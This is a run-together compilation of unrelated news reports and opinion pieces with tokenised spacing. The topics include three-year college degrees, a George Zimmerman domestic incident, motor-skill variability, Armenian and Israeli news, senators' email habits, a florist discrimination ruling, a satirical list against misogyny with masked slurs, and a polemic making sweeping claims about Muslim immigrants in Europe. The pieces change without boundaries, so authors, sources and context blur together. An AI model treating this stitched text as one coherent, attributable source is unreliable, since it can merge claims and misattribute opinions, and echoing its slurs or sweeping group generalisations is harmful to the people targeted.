AB 853 recently passed solidly in the state Assembly by a 50-25 vote and awaits action in the state Senate . If it clears its remaining hurdles , California may be building an anti-offshoring firewall around its utility industry .
Will Marshall is the president of the Progressive Policy Institute . Paul Weinstein Jr. is director of the Public Management Program at Johns Hopkins University and a PPI Senior Fellow . The opinions expressed in this commentary are solely those of the authors .
( CNN ) In rolling out an ambitious higher education plan this month , Hillary Clinton put a genuine national dilemma -- America 's ballooning student debt crisis -- at the center of the 2016 debate . What a refreshing contrast to her Republican opponents .
Clinton 's `` New College Compact '' is a big , multifaceted plan to take the debt monkey off the backs of millennials who attend public universities . But one thing it is not is cheap -- the price tag is $ 350 billion . And it does not do enough to rein in college tuition costs , much less roll them back .
So let us offer a friendly amendment that would do just that and thereby complement Clinton 's otherwise creative proposal . Our suggestion ? The three-year college degree .
While some schools might be tempted to squeeze a four-year degree into three years , that approach would be unwise , given that the majority of today 's college students need six years to complete a bachelors
A better approach would be for schools and their accreditors to rethink their curriculum . For example , reducing the number of electives , cutting back on core requirements or shifting to shorter semesters are all options that schools could use to move to a three-year bachelors and improve the educational experience .
For students and their families , finishing college in three rather than four years would cut the cost of tuition and fees by 25 % . On average , they would see total savings of $ 8,893 for students attending four-year public schools ( in-state ) and a $ 30,094 reduction for those at private institutions .
Cutting tuition by a quarter , of course , would reduce the amount students need to borrow . Nearly 70 % of bachelor degree holders have taken out student loans , with an average debt burden of $ 29,400 . Assuming someone borrows $ 29,400 at the going rate of 4.66 % over four years , the interest owed would amount to $ 7,505 . But shaving a year off college cuts that interest tab to about $ 5,629 , a savings of $ 1,876 . And keep in mind we are talking averages here ; the many students carrying debts well above the average will reap bigger savings .
JUST WATCHED Senate to take up student loan rates Replay More Videos ... MUST WATCH Senate to take up student loan rates 02:53
For those who believe a three-year degree will make U.S. college graduates less competitive in the global marketplace , think again . The three-year degree is good enough for Oxford and Cambridge , and the rest of Europe is following suit . To date , 46 European governments have signed onto the Bologna Process , which is making the three-year college degree the norm across the EU .
Compressing college into three years , and making it cheaper , could help boost America 's notoriously low completion rates . What 's more , with the rise of the knowledge economy , U.S. students increasingly find that they need more than a college education to compete for good jobs .
For most young Americans , college is no longer the end game but rather a stopover on the road to graduate school or more specialized training . While four-year colleges are graduating 1.8 million students each year , there are 1.7 million students in graduate school .
But would n't cutting a year of college force schools , particularly those with small endowments , to jack up tuition or cut their budgets dramatically ? Not necessarily .
First , our proposal prohibits schools from increasing tuition to offset the loss of a year 's revenues . Second , given that campus capacity would be greater with the removal of the fourth year , colleges could increase the number of students in each incoming class . ( Under our approach , students would be charged by the year , not the credit hour ) .
While schools that adopt the three-year option will face transition costs over the initial three years , many -- particularly the most attractive ones in the top two-thirds of college rankings -- should eventually be made whole .
JUST WATCHED Obama : Many to blame for college costs Replay More Videos ... MUST WATCH Obama : Many to blame for college costs 01:27
Earning a college degree has long been considered the surest way to achieve the American dream . But that dream is receding as working and middle class families go deeper into hock to pay skyrocketing tuition .
What 's more , according to a PPI analysis of Census figures , median wages for recent college graduates have dropped by a stunning 18.5 % for men and 9.5 % for women since 2000 . Given this double whammy facing young Americans , Hillary Clinton surely deserves credit for focusing public attention on making higher education more affordable and accountable .
Her compact , however , relies heavily on expanding public subsidies to achieve its laudable goal of helping students graduate from public institutions unencumbered by crushing debts . While Clinton proposes to pay for these subsidies ( much of which go to states ) by capping tax breaks that mainly benefit upscale households , it 's unlikely congressional Republicans would go along with a spending plan that sticks `` the rich '' with the bill .
Our approach puts more pressure on colleges to get their escalating tuition costs under control . Let 's give both students and taxpayers a break by requiring colleges to offer three-year degrees .
This article is from the archive of our partner .
George Zimmerman , acquitted of charges relating to the death of 17-year-old Trayvon Martin , was questioned by police on Monday following an altercation that , reportedly , involved a gun . This is n't the first run-in Zimmerman 's had with the law since going free this summer . While earlier reports , citing Lake Mary police , indicated that Zimmerman was in custody , a police spokesperson now says that Zimmerman is no longer in custody .
Here is Shellie Zimmerman 's 911 call , via WKMG .
Zimmerman will not face charges after the incident . On Monday , Police Chief Steve Bracknell announced Shellie Zimmerman and her father , `` both have declined to press charges against , '' Zimmerman . `` We have no victim , no crime , '' he said . A state attorney could have pursued charges against Zimmerman . Police took away Zimmerman 's gun following the incident .
Zimmerman , apparently , has already claimed that he was acting in self defense :
NOW : # GeorgeZimmerman claims self-defense in altercation w/wife 's father , PIO says . — Ryan Hughes - WFTV ( @ RHughesWFTV ) September 9 , 2013
According to the Associated Press , Zimmerman 's wife called the police on her husband after she says he threatened her and her father . Just days ago , George Zimmerman 's wife Shellie announced she was filing for divorce . The deputy police chief for Lake Mary told ABC News that `` there was some kind of domestic [ incident ] , '' adding , `` we know that with his wife and father-in-law . Apparently there were some weapons involved and threats . '' Here 's more from ABC , this time citing Shellie Zimmerman 's version of the story , via her attorney Kelly Sims :
Zimmerman pulled a knife on [ Shellie ] today after she discovered a firearm in the house they shared . He then pulled a gun on his wife and her father after a verbal altercation .
Earlier , Police spokesperson Zach Hudson said that Zimmerman was in `` investigative detention , '' meaning that he was detained on site while the officers complete their investigation of the incident — but he has n't been arrested or charged with a crime . Hudson explained further :
`` Anytime we have anybody suspected of doing anything , we place them in investigative detention until a complete investigation has been done . ''
Meanwhile , Zimmerman 's brother Robert Zimmerman Jr. has already weighed in on the news :
We 've learned from GZ case not to `` jump to conclusions '' , to wait for facts , & to avoid speculation . `` News '' is a business - not your friend . — Robert Zimmerman JR ( @ rzimmermanjr ) September 9 , 2013
WKMG in Florida has a helicopter on the scene . A reporter at the Orlando Sentinel added more details :
Lake Mary police confirm # GeorgeZimmerman in custody , police investigating `` possible domestic battery '' on Sprucewood Road . — Jeff Weiner ( @ JeffWeinerOS ) September 9 , 2013
More on # GeorgeZimmerman : Police spokesman says its his understanding gun involved . No significant injuries . `` Possible domestic battery . '' — Jeff Weiner ( @ JeffWeinerOS ) September 9 , 2013
Lake Mary Chief : Shellie Zimmerman & her dad consulting with lawyer as to whether to press charges against # GeorgeZimmerman . — Jeff Weiner ( @ JeffWeinerOS ) September 9 , 2013
Photo : WKMG .
This post on a developing story has been updated with new information .
This article is from the archive of our partner The Wire .
We want to hear what you think about this article . Submit a letter to the editor or write to letters @ theatlantic.com .
Your Brain Is n't Wired for Consistency - but That 's Not as Depressing as It Sounds
Synopsis Ever wonder why it is so difficult to hit that perfect shot twice in a row ? Turns out our brain is wired not for absolute consistency , but something more important .
Have you ever noticed how difficult it is to reproduce your signature exactly the same way every single time ?
Or play a G major scale , or hit a golf ball , or throw a dart in exactly the same way twice in a row ( never mind 10 times ) ?
These seem like reasonably straightforward motor tasks . So would n't it be reasonable to assume that if we put in enough hours , we should eventually be able to execute these tasks perfectly , 100 % of the time ?
At least , that 's what the maxim “ practice makes perfect ” seems to promise us . So…why are none of us there yet ?
As a kid , I used to wonder…was I just not working hard enough ? Was there some trick or hack or tweak that I had overlooked ? Was my pinky just too short ? My chinrest too flat ?
Or…gulp…maybe I just was n't talented enough ?
Well , it turns out that even elite athletes ca n't perfectly reproduce the same exact movement patterns with machine-like consistency . Because it appears that our brain is n't wired for that kind of consistency - no matter how much we practice .
Wait , what ? ! So is practicing ultimately just a cruel exercise in futility ?
Muscles vs. brain
When we miss a shift or play something out of tune despite nailing it the last 8 times in a row , the natural assumption is that our muscles screwed something up . That our hands , arms , body , etc . did something wrong during the movement itself .
And that may very well have happened , but our muscles are only part of the equation . Our brain plays an important role in the movement planning stage - before our muscles even begin to act .
Seeking to learn more about this potential source of variability , a team of researchers at Stanford designed an experiment to measure the relationship between brain activity occurring before muscle movements , and small variations occurring during the movement itself .
Monkeys like juice
To do this , they trained a couple monkeys to reach for different colored dots on a screen at two different speeds - “ slow ” and “ fast. ” The monkeys learned to sit in front of a screen , wait for a green or red dot to appear , and when given a cue to go , reach and touch the dot to get a reward . If they reached slowly for a green spot , they 'd get some juice . And if they reached quickly for a red spot , they 'd earn some juice too .
A lot of effort went into getting the monkeys to reach at a consistent velocity , and there was a very specific range of velocity that the monkeys had to match in order to get their juice . So while it may not have been too difficult for the monkeys to hit the dot , doing it at the correct velocity was a little more challenging .
Meanwhile , as the monkeys were reaching for dots and earning juice , the researchers monitored the activity of neurons in two specific motor-related parts of the brain - the dorsal premotor cortex , and primary motor cortex .
Action planning vs execution
Over the course of thousands of reaches , an interesting picture began to emerge . Despite being motivated to perform as consistently as they could ( because , you know , there 's juice at stake ! ) , rarely were the monkeys ' reach speeds exactly the same . And as the researchers predicted , these small variations in reach speed were correlated with small variations in the monkeys ' brain activity , occurring hundreds of milliseconds before the monkeys even moved a muscle .
Through some pretty intense number crunching , the researchers were able to estimate that about 50 % ( and possibly more ) of the inconsistencies in reach speed were attributable to variability in the brain during the action planning stage of movement .
So to bring this back to our scales and bunker shots and barroom darts bets , even though it 's easy to assume that something went wrong during the execution part of an action , the results suggest that it 's just as possible that something went wrong before the shift , swing , or throw even began , when our brains were planning the movement . At first glance , this sounds like bad news . But it 's actually not .
Flexibility trumps consistency
The researchers suggest that our brain is n't wired for consistency , but rather , for flexibility .
`` The nervous system was not designed to do the same thing over and over again . The nervous system was designed to be flexible . You typically find yourself doing things you 've never done before . '' ~Mark Churchland
And when you think about it , this actually makes pretty good sense , because how often do we need to perform something in exactly the same way ? Sure every musician wants to play in tune , with good sound and rhythm , but sometimes one may want to play it slightly louder , or slower , or in a way that matches a different acoustical setting , or slightly sharper or flatter depending on what our colleagues are doing .
Likewise , no two golf shots are ever exactly the same . Likewise in basketball , tennis , darts , billiards , etc .
Imagine how limited we would be if we could execute a skill perfectly , but only if the conditions of performance were precisely like that of practice ? After all , the best musicians or athletes are n't those who can reproduce an exact and unvarying motor pattern under ideal , unchanging circumstances , but who can achieve the desired end result in many different ways , no matter the circumstances .
Takeaways
There are two main takeaways for me .
1 ) Practicing is not futile . The more we practice , the more consistently closer we can get to technical excellence . What 's important , is that we avoid getting too obsessed with playing a passage in exactly the same unvarying way , but rather , focus on being more flexible and resilient in achieving our desired result despite the inevitable variability .
For instance , I could never get my serve toss in tennis to go to exactly the same place , but I could still get the ball in ( more or less ) , despite the slight imperfections of my toss .
Or , I might never be able to recreate the exact positioning of my violin at an angle of 105.4 degrees relative to the floor , with my pinky finger 3.2 centimeters above the E string 6 degrees right of center , and my index finger shifting up on the A string towards 8th position with a constant .56 lbs per square inch of pressure - but I could still get the parallel octaves in tune , even with cold , clammy hands , precisely because I practiced doing so in dozens of different ways , instead of trying to identify the single “ perfect ” way to execute this shift .
2 ) This is a little more tangential , but I think it 's helpful to understand that peak performances are not fully under our control . Those days when everything goes right , and we ca n't miss do feel pretty awesome…but there 's some luck involved too . ( Check out the great 99U talk How to Overcome the 3 Fears Every Creative Faces , where the speaker gets into this around 5:58 ) .
Optimal performances , on the other hand , are more under our control . These are the occasions when things go as well as they possibly could have , given the circumstances - which still feels pretty terrific .
I 'm reminded of a story the violinist Stephen Clapp once told me about a performance he gave at the Aspen Music Festival one summer . As he and his colleagues were walking off stage , rather than complaining about missed notes or other imperfections , the violist in his ensemble remarked , “ You know , that 's about as well as I could have played that today . ”
He said that this comment always stuck with him , given the stature of the violist . And not only does this seem like a much healthier and productive way to approach performances , it 's quite pragmatic as well . As one of my mentors once reminded me - you ca n't play better than you can play .
A version of this article originally appeared at The Bulletproof Musician .
Please enable JavaScript to view the comments powered by Disqus .
Disqus
While the Armenian government talks about developing tourism , many of the country 's hidden natural wonders are threatened by official neglect and commercial abuse .
Take Lake Gomk , in Armenia 's Vayots Dzor .
Gevorg Gasparyan visited the lake on May 30 and found what can only be described as a dying body of water .
“ It 's no longer a beautiful lake . You can no longer access it . There are boulders strewn about . Some are in the lake , ” Gasparyan told Hetq .
The Armenian government granted a company called Benson the right to use the lake to raise fish . The permit states that the company must not damage the lake 's ecosystem .
Armen Vardanyan , spokesman for Armenia 's environment ministry says he does n't know if the company is fish farming in the lake . He 's waiting for a report from local environmental inspectors now on site .
Benson company owner Karen Aslanyan told Hetq that “ the lake 's surface has n't decreased by one millimeter ” and that all reports to the contrary are lies .
“ Environmentalists went up to the lake today and were convinced . I 'm engaged in fish farming . Why would I want the lake to dry up ? ” says Aslanyan , adding that he 's raising trout in the lake .
As for the boulders and debris spotted by Gasparyan , Aslanyan says they 're in an area outside the lake which collapsed . The boulders were installed to prevent further erosion , he claims .
Top photo : Lake Gomk ( 2013 )
Photos : Gevorg Gasparyan
Israel 's state electricity corporation says it has restored power to Palestinian cities in the West Bank after a two-day reduction due to outstanding debt .
The Israel Electricity Corp. said Wednesday it reached a stop-gap agreement with the Palestinian Authority , which will repay about $ 500,000 in debt . The company says the Palestinians owe it nearly $ 460 million .
Israel halved electricity to Bethlehem on Monday .
Company Chairman Yiftach Ron Tal says the Palestinian government must find a solution to the remaining debt within the coming days to prevent additional cuts .
Lawmaker Ayman Odeh , leader of a bloc of Arab parties in Israel 's parliament , helped negotiate the deal .
Odeh says `` this was a temporary band-aid '' and that a solution is needed for a `` Palestinian state with financial and energy stability . ''
If you want to email with Sens . Lindsey Graham , left , or John McCain , right , you 're out of luck . AP Photos
If you have nothing to hide you should have nothing to worry about .
Leading national security hawks Sens . John McCain , R-Ariz. , and Lindsey Graham , R-S.C. , likely agree . The duo admit they do n't use email .
`` I do n't email at all , '' McCain told the National Journal last week . `` I have other people and I tell them to email because I am just always worried I might say something . I am not the most calm and reserved person you know . ”
Graham , on the other hand , appears never to have caught up with the Internet revolution . “ You can have every email I 've ever sent . I 've never sent one , ” Graham told NBC 's “ Meet the Press ” program Sunday .
The two senators work closely to push for a more muscular foreign policy . They vigorously denounced whistleblower Edward Snowden and resisted proposed reforms to the National Security Agency 's dragnet phone and Internet spy programs .
Steven Aftergood of the Federation of American Scientists says willful ignorance of technology may make it difficult for lawmakers to grasp privacy concerns and the need for reforms .
“ It 's surprising to hear that any national political figure would be unfamiliar with email , ” he says , `` to be unfamiliar with email suggests a lack of competence or a lack of curiosity about one of the features of contemporary life . ''
Aftergood says `` it might also make it harder for such officials to appreciate public concerns about email privacy , bulk surveillance , spam and other such things . ”
Pending legislation in Congress would require police to get warrants for emails older than 180 days and prohibit the NSA and other agencies from `` backdoor '' access to U.S. Internet records . The measures appear to have majority support in the lower chamber but Senate interest is cool .
Not all congressional fans of the NSA 's activities proudly resist using electronic mail technology .
Sen. Dianne Feinstein , D-Calif. , the oldest member of the Senate at 81 and former chair of the Senate intelligence committee , does use email , spokesman Tom Mentzer says .
Sen. Dan Coats , R-Ind. , who last year strongly denounced legislation that would have ended the NSA 's mass collection of U.S. phone records , also uses email , spokesman Matt Lahr says .
Sen. Barbara Mikulski , D-Md. , who scolded state lawmakers seeking to cut off the NSA headquarters ' water and electricity , does too , spokeswoman Rachel MacKnight says .
Sen. Bill Nelson of Florida , the only Democrat to vote against cloture for the NSA-reforming USA Freedom Act in November , “ uses email sparingly , ” spokesman Dan McLaughlin says . “ For work he prefers hard copies in his read file or phone calls from senior staff . ”
Editorial Cartoons on the NSA View All 107 Images
Spokespeople for other leading defenders of the spy agency 's practices , such as Sens . Marco Rubio , R-Fla. , Richard Burr , R-N.C. , and Orrin Hatch , R-Utah , did not immediately respond to requests for comment .
Graham and McCain ( and possibly other colleagues ) are part of an increasingly small minority of Americans who do not use email . The Pew Research Center found last year 13 percent of American adults do not use email or the Internet . A previous Pew poll found in 2011 that 92 percent of people who had used the Internet also used email .
Corrected on March 9 , 2015 : Information on Sen. Bill Nelson 's email usage was added to this article .
Israel 's separation wall pictured from Aida refugee camp in Bethlehem . ( Charlie Hoyle/File )
By : Megan Hanna
BETHLEHEM ( Ma'an ) -- Israeli military forces issued a disturbing message to residents of Aida refugee camp in Bethlehem
on Thursday
, telling them that unless they stopped throwing stones `` we will gas you until you die . ''
Israeli military forces raided the camp and fired tear gas and flash grenades indiscriminately at people 's windows , balconies , and down the narrow streets , allegedly in response to Palestinian youths throwing stones at the Israeli separation wall that borders the community .
During the raid , an Israeli soldier in a military vehicle addressed the protesters and residents of the camp through a loudspeaker in Arabic . The disturbing incident was caught on film .
“ Inhabitants of Aida , we are the Israeli occupation forces , if you throw stones we will hit you with gas until you die . The children , the youth , and the old people , all of you – we wo n't spare any of you ” .
During the assault of the protesters , a 25-year-old was arrested . The speakerphone announcement continued , “ We have arrested one of you , he 's with us now . We took him from his home , and we will kill him while you 're watching as long as you throw stones . ”
The chilling message concluded : “ We will blind your eyes with gas until you die , your homes , your families , brothers , sons , everyone ” .
Subsequently after the announcement , Israeli forces fired tear gas and rubber-coated steel bullets indiscriminately in the streets .
The use of force was so extreme that children from Aida 's two community centers and residents of nearby houses had to be evacuated to another part of the camp , and at least one youth was taken to hospital with respiratory problems . The clashes are part of a spate of violence that has unfolded across Israel and the occupied Palestinian territory over the past month , in which at least 64 Palestinians and 9 Israelis have been killed .
Israeli military vehicles invaded Aida refugee camp and used loud speakers to leave the Palestinians a message .. Watch , listen and share .. ( English subtitles ) # Palestine Posted byMohammed Matteron Thursday , 29 October 2015 among the residents -- the majority of whom were n't involved in the stone throwing -- the film provides evidence of a member of the Israeli army admitting to the potentially lethal application of tear gas .
Last week , on Oct. 21 , Hashem al-Azzeh , 54 , died in Hebron due to excessive tear gas inhalation used by Israeli forces to subdue protesters , and two days earlier an elderly woman in the Batan el-Hawa area of Silwan , East Jerusalem , died from the effects of tear gas fired during clashes .
“ In this statement , we see -- among a range of potential criminal offences -- a public threat to kill Palestinian civilians , and to execute a prisoner , '' Simon Reynolds , Legal Advocacy Coordinator at the BADIL Resource Center for Palestinian Residency and Refugee Rights , told Ma'an .
`` Though such threats are appalling , they are not necessarily surprising . In light of the mounting civilian death toll among Palestinians , such threats merely add words to the deed .
“ What we are seeing is an apparent policy of lawlessness in which Israeli forces can wield deadly force with virtual impunity . Especially troubling is that this is a policy that seems to have , at the very minimum , the tacit acceptance of the highest levels of government. ” Numerous rights groups have publicly condemned Israel 's disproportionate military response while policing demonstrations and responding to alleged attacks .
“ Indiscriminate or deliberate firing on observers and demonstrators who pose no imminent threat violates the international standards that bind Israeli security forces , '' Kenneth Roth , executive director of Humans Rights Watch said on Oct. 11 , after a HRW research assistant was shot and injured while observing a demonstration near Ramallah .
Earlier this week , Amnesty International demanded that Israel stop unlawful killings in occupied Palestinian territory , stating that Israeli forces appeared to have `` ripped up the rulebook . ''
“ There is mounting evidence that , as tensions have risen dramatically , in some cases Israeli forces appear to have ripped up the rulebook and resorted to extreme and unlawful measures , '' Philip Luther , Director of the Middle East and North Africa Programme at Amnesty International said . `` Intentional lethal force should only be used when absolutely necessary to protect life , '' he added . `` Instead we are increasingly seeing Israeli forces recklessly flouting international standards by shooting to kill in situations where it is completely unjustified . ''
In February last year , Amnesty released a report entitled 'Trigger-happy ' , which found that Israeli forces display a `` callous disregard '' for human life , with near total impunity for the killing of Palestinian civilians in cases examined since 2011 .
Megan Hanna is a freelance photographer and journalist based in Palestine .
A Washington state florist who refused to provide services for a same-sex wedding in 2013 broke the state 's antidiscrimination law , the state 's Supreme Court ruled .
Barronelle Stutzman , a florist in the town of Richland , said she was exercising her First Amendment rights . Her lawyers promised that they would ask the U.S. Supreme Court to overturn the decision .
Stutzman had previously sold the couple flowers and knew they were gay . However , Stutzman told them that she could n't provide flowers for their wedding because same-sex marriage was incompatible with her Christian beliefs .
Washington Attorney General Bob Ferguson and the couple sued her , saying she broke state anti-discrimination and consumer protection laws , and the lower court agreed . The state 's nine high court justices upheld that verdict .
Michael Scott , a Seattle attorney who worked with the American Civil Liberties Union to represent Robert Ingersoll and Curt Freed — the couple denied the flowers — had previously told justices he did n't believe Stutzman 's floral creations constituted speech . By providing flowers for a same-sex marriage , he argued , `` she 's not endorsing same-sex marriage . She 's selling what she sells . ''
Ferguson had said the state 's argument rested on longstanding principle , and uprooting it would weaken antidiscrimination law .
After the arguments in the Supreme Court case last November , at a packed theater at Bellevue College , a large crowd of Stutzman 's supporters greeted her outside , chanting her name and waving signs with pictures of roses that said `` Justice For Barronelle . ''
In a February ruling , Benton County Superior Court Judge Alexander Ekstrom found that Stutzman 's refusal to provide flowers because of sexual orientation violated Washington 's anti-discrimination and consumer protection laws . She has been fined $ 1,000 , plus $ 1 in court costs and fees .
Stutzman entered the florist business 30 years ago , when her mother bought a flower shop and she started as a delivery person .
The Associated Press contributed to this report
Source : Michaelangelo `` The Fall of Man '' : Wikipedia
I wrote a list of tips , ( below ) for how one might disinherit their daughter without feeling . I did this as a way to expose the age-old misogyny that continues to show up , every day , in every area of our lives .
Like racism , ethnocentrism , homophobia , transphobia , and every other insidious form of hatred and , misogyny does not only reveal itself in overt acts of and violence but more often it lingers subtly in our justice system , politics , religions , entertainment , , workplaces , and day-to-day social exchanges . My intention here is to not only spotlight how we continue to harm women—and anyone considered to be “ less than ” —but also to deconstruct the various ways we seek to justify the actions we take against them .
As psychological studies have proven , many of our pervasive biases are socially conditioned . But , as this study shows , if our subliminal prejudices are made conscious , we often attempt to correct them . And that is my hope for you as you glance over the list below .
Notice which of the “ tips ” that you consider to be ludicrous ; which of them resemble thoughts you 've had yourself ; and which you recognize in the thoughts of your , colleagues , and communities .
Hopefully by exposing our own subliminal forms of hatred and disdain for other people —especially those who lack social power and privilege—we can work to reclaim our daughters , sisters , mothers , sons , and everyone else we disinherit when our biases go unchecked .
So , how does one go about disinheriting their daughter without guilt , you ask ?
Name her Eve .
Whenever Eve speaks , get the whole family to roll their eyes at her , especially when she carries on about being left out : There she goes again , All about Eve .
Name her Megyn Kelly . Name your son . Then follow his lead .
Adopt her from non-white birth and pretend she 's absolutely no different than your white kids . Even when they tease her or when she always happens to be the one to `` go to jail '' or to `` get shot '' when they `` play . '' And when she finally gets angry at your white kids , point your finger at her and say , `` You see ? That 's why you 're out of the will ! ''
Remind her , every day , how hard it is , for you , that she was not born a boy . And if she was born a boy but is no longer a boy , say , `` Why 'd you have to go and ruin a good thing ? '' But if she was born a girl and is now a boy , say , `` What happened to my sweet little girl ? '' Then wait for her outside the neutral bathrooms at Target , in protest , and shout , `` Why are you doing this to me ? ! ''
Blurt out things like , `` Emails ! , '' or `` Speeches ! '' or `` How dare you want to be president ? ! '' And then just stare at her . Because she knows what she did .
Invite her and her wife to a barbecue in Texas or Alabama or Mississippi or North Carolina , and when she declines , due to concerns for their safety , say , `` You obviously do n't want to be part of this family . '' And if she does n't have a wife -- or a girlfriend , for that matter -- accuse her of being a closet lesbian and of always shutting you out .
Keep track of every cruel thing you ever did to her , and then write her a nasty letter -- with bullet points -- explaining how she did those things to you . Because someone did those things to you . Right ? Someone who looms large in your life , and is hard for you to challenge ?
Encourage her to take ballet and tap and to be a contestant on The Bachelor , and then feign ignorance about the subtle viciousness of girl-on-girl , and look at her with befuddled Scooby Doo-eyebrows when she enlightens you about said bullying , and when she leans on you for comfort , say , `` C'mon now , do n't be paranoid , '' and be surprised when she ( suddenly , out of nowhere ) becomes emotionally unstable , `` Way too unstable to manage money , '' your sons will say , while their obedient wives nod in agreement -- thinking only of what 's best for you , of course -- and then take the advice of your loving sons , and their good wives , and reason with her : `` Honey , if I left anything for you I 'd be contributing to your problem . ''
Wait til she 's over the hill before you die . By the time she 's in her thirties she 'll have long forgotten her silly , of being treated fairly .
Remind yourself that not every daughter deserves to be cut off , just the ones like her : the independent-minded , loudmouthed , sl & tty , c # nty , b $ tch , wh @ re , f % ggots . ( That 's right , you said it , `` f % ggots , '' because she might not actually be a daughter at all , she may be a gay son -- or some other black sheep among your otherwise normal flock -- but , either way , you are certain you would have loved her all the same if only she did not insist on drawing to herself -- and casting on your house -- in all those classic ways that vain daughters and flamboyant gay sons do : with their revealing outfits ; and sibilant S 's ; and brazen bids for recognition , the indecency ; and their shrill , redundant , migraine-inducing , Roars for equality ... I mean , c'mon , she was asking for it all along . Was n't she ? ... )
Ask yourself : Does she bring me anything but down ? ( I mean , she ca n't tell a joke without referencing the sober truth , killing the family buzz , or being the Debbie Downer . )
Remind yourself what King Lear said : `` Nothing comes from nothing . '' ( See ? You know Shakespeare ... You 'd think she was the only one who ever read a book the way she goes on about herself . Well , Lah -tee-dah . If she 's so much better than the rest of you , she obviously does n't need your help . )
Badger people to nod in sympathy about your to dispossess her . More than half of them will oblige . If not , go to your local pub , college , or bigoted elected official , and try again . Repeat as needed .
Try disinheriting your son : the straight , white one , who never had an abortion . Super hard to do , right ? Now cut off the daughter . By comparison it should be a cakewalk .
Do n't overthink this . Few will challenge your decision to disinherit your daughter . And if they do , their whiny little voices will remind you of her , and why you had to do it in the first place .
Copyright , Mark O'Connell , LCSW-R
-- -- -- -- -- -- -- -- -- -
Related articles by Mark O'Connell , LCSW-R , about the links between misogyny , homophobia , racism , and other forms of socially conditioned fear and hate :
Bully Gets `` Girl ''
The Right to Bare Breasts
Do n't Act , Do n't Tell
Do n't Act , Do n't Tell is in Effect
She 's So Trauma
The Same Second Class
Viola Davis Matters
Hollywood Diversity Awakens
Hand-in-Hand : Marriage Equality and Gender Equality
Many physical casualties are yet to come . But the next political casualties should be the entire political class who have refused for so long to face some very bitter truths of their own devising . After Paris , they can be no longer seek asylum from reality in the merry myth of multiculturalism
Even more than most other first-world nations modern Europe suffers from a potentially fatal cognitive dissonance . All the time we hold two wholly contradictory ideas in our heads .
The first idea is that our countries are multicultural paradises where anyone from anywhere in the world can come and deserves to settle if they so wish . We believe that those who come here will assimilate , but at the same time we do not especially mind if they do not , and offer no incentives for them to do so . Indeed if they do not wish to assimilate we respect them for holding on to their own culture . At the same time it is natural that we should decry as “ racist ” anyone who wants to hold on to what is left of our own culture . This part of our brain talks about “ integration ” and “ radicalisation ” and “ violent extremism ” and all the other weakly euphemisms of our time .
Yet all the time our brains hold another idea—ordinarily pushed to the very recess of our minds but always capable of breaking out . This holds the possibility that this is all nonsense . That integration if it does ever happen takes centuries to occur and has certainly not happened in present-day Europe . This part of the brain knows from observation and from an awareness of history that a strong religious culture when placed into a weak and relativistic culture will make itself felt long before it will significantly adapt . If there is a reason why we repress this instinct and favour the wilfully optimistic version of events it is because the consequences of accepting this truth are so utterly calamitous and damn the majority beliefs of a whole generation .
The migration crisis , which has been going on for years but has gained particular attention this year , is a fine example of these two parts of our brain struggling with each other . This year Germany is talking of taking in an additional 800,000 citizens—or 1 per cent of its current population . It plans to bring in a similar number of people mainly from Muslim-majority countries in each of the coming years . In other European countries the same numbers emerge . Perhaps to see this best you have to see it on a local level . In Malmo , Sweden , which once had a thriving Jewish community , just under 1000 Jews remain . Today , every day , around 1000 Muslim refugees arrive in Malmo . So every single day 's immigration of new immigrants dwarfs the remnants of a long-established community .
There are so many things to be said about the rotten thought-culture that has led to this pass . But the most instructive way of considering the confusion of Europe is to consider something that Chancellor Merkel herself said only five years ago . Back in 2010 she gave what at the time appeared to be a crucial speech . “ Multiculturalism has failed , ” she declared . So striking and significant was that 2010 statement that the then French President , Nicolas Sarkozy , and British Prime Minister David Cameron gave their own “ multiculturalism has failed ” speeches in the months that followed .
I remember the excited copy that ran . I wrote some of it myself . But when you look back on those speeches of only five years ago they make less than no sense . If by “ multiculturalism ” Merkel , Sarkozy and Cameron meant—as they seemed to mean—the living of parallel lives in the same society , then what have they done in the five years since to change this around ? If you go to parts of the north of England , to Marseilles or the suburbs outside Paris and Berlin , the lack of integration is as bad as it was then : the men who wander around the north of England dressed for the hillsides of Pakistan ; the women who wander around London dressed for seventh-century Arabia . Have these people changed their views but not their mode of dress ? It seems radically unlikely .
And so we come to the true perplexity : if multiculturalism had failed when immigration was relatively low , why on earth would it work now that immigration is at a historic high ? Why would multiculturalism in Britain have failed in 2011 but not in 2015 when the UK government has seen a ten-year high in immigration even before you take the latest migrant-wave into account ?
But then almost nothing about the grand schemes of Europe 's political elites has made sense for some time . All are good at talking about how they will tackle problems “ over there ” . Few if any have any idea what to do about our problems “ over here ” .
After the latest terrorist atrocities in Paris , President Hollande said that France would be “ merciless ” in its pursuit of the perpetrators and in taking the war to the barbarians of ISIS . But surely he must know by now that this is the easy part . Bombing ISIS from the skies of Iraq or Syria is a pretty much cost-free exercise . The likelihood of losing even one French pilot is minimal and what fall-out there will be in Syria or Iraq can be ignored from France . The problem is the people at home . What is anybody going to do about them ? What is Hollande going to do in an EU which has the free movement of peoples as one of its core objectives ?
This is when a whole set of other aspects of our cognitive dissonance chime in . We will pretend , for instance , that we do n't have the domestic problem we have because we will reassure ourselves and each other that the “ vast majority ” of Muslims in our countries are opposed to terrorism like that which occurred in Paris . Earlier this year , after the first atrocities of the year in the French capital , the BBC commissioned a poll of British Muslim opinion . It found that 27 per cent of British Muslims were “ sympathetic ” to the Paris terrorists with another 10 per cent either saying that they did n't know whether they were sympathetic to the attackers or refusing to answer the question . Our national broadcaster gave this story a necessarily positive spin by headlining it , “ Most British Muslims oppose Mohammed cartoon reprisals ” . There is your “ most ” and that is your “ majority ” . Only a mere quarter of the Muslims in your country are so fantastically unaware or unbothered about your laws and customs that they sympathise with violent reprisals for breaching Islamic “ blasphemy ” codes .
Two parts of the same brain . The first tells us that to be properly “ European ” we must allow anyone who wants to come here to come here ; we must be against borders and for multiculturalism . The other part of the brain watches and waits . It can see that the new arrivals are not only coming in unprecedented numbers but are bringing unprecedented problems . The first part of the brain pretends they will assimilate and that given time Islam will go through its own “ reformation ” . The second part of the brain starts to realise that we may not have that time .
